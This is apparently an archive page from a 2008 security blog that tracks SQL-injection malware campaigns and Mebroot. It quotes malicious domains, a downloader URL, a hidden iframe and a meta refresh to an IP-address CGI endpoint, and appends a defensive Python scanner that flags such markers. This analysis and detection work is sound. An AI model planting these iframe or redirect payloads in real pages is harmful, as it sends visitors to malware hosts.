Archive for September, 2008

www3.ss11qn.cn/csrss/w.js

Posted in sql injection on September 22, 2008 by s3cu

A new round of SQL injection attacks is injecting this malicious link.
The w.js script essentially loads new.htm in an iframe.
The content of new.htm is as follows:
Continue reading


www.ok2bstr8.com/index_13.html

Posted in sql injection on September 11, 2008 by s3cu

The URL contains links to http://www.ok2bstr8.com/view.exe

view.exe is a downloader – VT analysis

The URL also has an iframe embedded:

<iframe id="01" src="2.html" frameborder="0" style="display:none"></iframe>

2.html links to malicious obfuscated JS:

<meta http-equiv="refresh" content="2;URL=http://79.135.167.18/cgi-bin/index.cgi?user2">

The above IP is associated with many domains such as minimal345.com
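
A defender-side check for the two markers shown in this post, a hidden iframe and a meta refresh to a bare IP address, as an added example (not code from the original post). The names scan, HiddenRedirectScanner and is_ip_literal are assumptions, and the sample markup is constructed from the two tags quoted above plus one benign iframe.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
REFRESH_URL = re.compile(r"^\s*\d+\s*;\s*url\s*=\s*(.+)$", re.I)

# Constructed sample: the two tags quoted in the post, merged into one page,
# plus a visible iframe that must not be flagged.
SAMPLE = """<html><body>
<iframe src="/widgets/map.html" width="600" height="400"></iframe>
<iframe id="01" src="2.html" frameborder="0" style="display:none"></iframe>
<meta http-equiv="refresh" content="2;URL=http://79.135.167.18/cgi-bin/index.cgi?user2">
</body></html>"""


def is_ip_literal(url):
    """True when the URL's host is a raw IPv4/IPv6 address, not a name."""
    host = urlparse(url).hostname or ""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


class HiddenRedirectScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # list of (kind, target) tuples

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            # Invisible by CSS, or collapsed to a 0/1 pixel box.
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if HIDDEN_STYLE.search(a.get("style", "")) or tiny:
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_URL.match(a.get("content", ""))
            if m:  # a refresh with no URL only reloads the page; ignore it
                url = m.group(1).strip("'\" ")
                kind = "meta-refresh-ip" if is_ip_literal(url) else "meta-refresh"
                self.findings.append((kind, url))


def scan(html):
    scanner = HiddenRedirectScanner()
    scanner.feed(html)
    return scanner.findings
```

Run scan() over pages pulled from the database-backed parts of a site; any "hidden-iframe" or "meta-refresh-ip" finding that the site's own templates do not produce is worth tracing back to the stored content.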

cdm1djeni.com/cgi-bin/index.cgi?dx

Posted in Mebroot on September 1, 2008 by s3cu

After a series of obfuscated JS scripts, the final decoded content is as follows:
Continue reading